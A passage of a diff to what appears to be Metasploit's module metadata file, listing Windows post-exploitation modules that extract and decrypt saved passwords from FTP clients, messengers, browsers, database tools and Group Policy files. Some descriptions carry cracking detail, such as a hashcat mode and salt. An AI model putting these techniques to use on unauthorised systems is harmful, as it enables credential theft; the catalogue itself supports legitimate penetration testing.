"post/windows/gather/credentials/filezilla_server", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "g0tmi1k" + ], + "description": "This module will collect credentials from the FileZilla FTP server if installed.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/filezilla_server.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/filezilla_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/flashfxp": { + "name": "Windows Gather FlashFXP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/flashfxp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It\n finds saved FTP connections in the Sites.dat file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/flashfxp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/flashfxp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/flock": { + "name": "Flock credential gatherer", + "fullname": "post/windows/gather/credentials/flock", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Flock on a remote Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/flock.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/flock", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/ftpnavigator": { + "name": "Windows Gather FTP Navigator Saved Password Extraction", + "fullname": "post/windows/gather/credentials/ftpnavigator", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/ftpnavigator", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/ftpx": { + "name": "Windows Gather FTP Explorer (FTPX) Credential Extraction", + "fullname": "post/windows/gather/credentials/ftpx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module finds saved login credentials for the FTP Explorer (FTPx)\n FTP client for Windows.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/ftpx.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/ftpx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/gadugadu": { + "name": "Gadugadu credential gatherer", + "fullname": "post/windows/gather/credentials/gadugadu", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Gadugadu credentials on a Windows host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/gadugadu.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/gadugadu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/gpp": { + "name": "Windows Gather Group Policy Preference Saved Passwords", + "fullname": "post/windows/gather/credentials/gpp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "Loic Jaquemet ", + "scriptmonkey ", + "theLightCosine ", + "mubix " + ], + "description": "This module enumerates the victim machine's domain controller and\n connects to it via SMB. It then looks for Group Policy Preference XML\n files containing local user accounts and passwords and decrypts them\n using Microsofts public AES key.\n\n Cached Group Policy files may be found on end-user devices if the group\n policy object is deleted rather than unlinked.\n\n Tested on WinXP SP3 Client and Win2k8 R2 DC.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)", + "URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html", + "URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx", + "URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/", + "MSB-MS14-025" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/gpp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/gpp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/halloy_irc": { + "name": "Halloy IRC credential gatherer", + "fullname": "post/windows/gather/credentials/halloy_irc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Halloy IRC Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/halloy_irc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/halloy_irc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/heidisql": { + "name": "Windows Gather HeidiSQL Saved Password Extraction", + "fullname": "post/windows/gather/credentials/heidisql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h0ng10" + ], + "description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/heidisql.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/heidisql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/icq": { + "name": "ICQ credential gatherer", + "fullname": "post/windows/gather/credentials/icq", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ICQ credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/icq.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/icq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/idm": { + "name": "Windows Gather Internet Download Manager (IDM) Password Extractor", + "fullname": "post/windows/gather/credentials/idm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sil3ntdre4m ", + "Unknown" + ], + "description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/idm.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/idm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/ie": { + "name": "Ie credential gatherer", + "fullname": "post/windows/gather/credentials/ie", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ie credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/ie.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/ie", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/imail": { + "name": "Windows Gather IPSwitch iMail User Data Enumeration", + "fullname": "post/windows/gather/credentials/imail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.", + "references": [ + "EDB-11331" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/imail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/imail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/imvu": { + "name": "Windows Gather Credentials IMVU Game Client", + "fullname": "post/windows/gather/credentials/imvu", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shubham Dawra " + ], + "description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/imvu.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/imvu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/incredimail": { + "name": "Incredimail credential gatherer", + "fullname": "post/windows/gather/credentials/incredimail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Incredimail credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/incredimail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/incredimail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/kakaotalk": { + "name": "KakaoTalk credential gatherer", + "fullname": "post/windows/gather/credentials/kakaotalk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for KakaoTalk credentials on a Windows host. KakaoTalk is a popular mobile messaging app most widely used in South Korea.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/kakaotalk.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/kakaotalk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/kmeleon": { + "name": "Kmeleon credential gatherer", + "fullname": "post/windows/gather/credentials/kmeleon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for K-meleon credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/kmeleon.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/kmeleon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/line": { + "name": "LINE credential gatherer", + "fullname": "post/windows/gather/credentials/line", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in LINE desktop application on a remote Windows host. LINE is the most popular Instant Messenger app in Japan.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/line.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/line", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/maxthon": { + "name": "Maxthon credential gatherer", + "fullname": "post/windows/gather/credentials/maxthon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Maxthon credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/maxthon.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/maxthon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mcafee_vse_hashdump": { + "name": "McAfee Virus Scan Enterprise Password Hashes Dump", + "fullname": "post/windows/gather/credentials/mcafee_vse_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Mike Manzotti ", + "Maurizio inode Agazzini" + ], + "description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n format is available for John the Ripper at the referenced URL.", + "references": [ + "URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mcafee_vse_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mdaemon_cred_collector": { + "name": "Windows Gather MDaemonEmailServer Credential Cracking", + "fullname": "post/windows/gather/credentials/mdaemon_cred_collector", + "aliases": [], + "rank": 600, + "disclosure_date": null, + "type": "post", + "author": [ + "Manuel Nader #AgoraSecurity" + ], + "description": "Finds and cracks the stored passwords of MDaemon Email Server.", + "references": [ + "BID-4686" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mdaemon_cred_collector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/meebo": { + "name": "Windows Gather Meebo Password Extractor", + "fullname": "post/windows/gather/credentials/meebo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sil3ntDre4m ", + "Unknown" + ], + "description": "This module extracts login account password stored by\n Meebo Notifier, a desktop version of Meebo's Online Messenger.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/meebo.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/meebo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/miranda": { + "name": "Miranda credential gatherer", + "fullname": "post/windows/gather/credentials/miranda", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Miranda credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/miranda.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/miranda", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/moba_xterm": { + "name": "Windows Gather MobaXterm Passwords", + "fullname": "post/windows/gather/credentials/moba_xterm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module will determine if MobaXterm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/moba_xterm.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/moba_xterm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mremote": { + "name": "Windows Gather mRemote Saved Password Extraction", + "fullname": "post/windows/gather/credentials/mremote", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine ", + "hdm ", + "mubix " + ], + "description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. The module will extract the connection\n info and decrypt the saved passwords.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/mremote.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mremote", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mssql_local_hashdump": { + "name": "Windows Gather Local SQL Server Hash Dump", + "fullname": "post/windows/gather/credentials/mssql_local_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Mike Manzotti ", + "nullbind" + ], + "description": "This module extracts the usernames and password\n hashes from an MSSQL server and stores them as loot. It uses the\n same technique in mssql_local_auth_bypass.", + "references": [ + "URL-https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mssql_local_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/navicat": { + "name": "Windows Gather Navicat Passwords", + "fullname": "post/windows/gather/credentials/navicat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "HyperSine", + "Kali-Team " + ], + "description": "This module will find and decrypt stored Navicat passwords.", + "references": [ + "URL-https://github.com/HyperSine/how-does-navicat-encrypt-password", + "URL-https://blog.kali-team.cn/Metasploit-Navicat-fbc1390cf57c40b5b576584c48b8e125" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/navicat.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/navicat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/nimbuzz": { + "name": "Windows Gather Nimbuzz Instant Messenger Password Extractor", + "fullname": "post/windows/gather/credentials/nimbuzz", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sil3ntdre4m ", + "Unknown" + ], + "description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/nimbuzz.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/nimbuzz", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/opera": { + "name": "Opera credential gatherer", + "fullname": "post/windows/gather/credentials/opera", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Opera credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 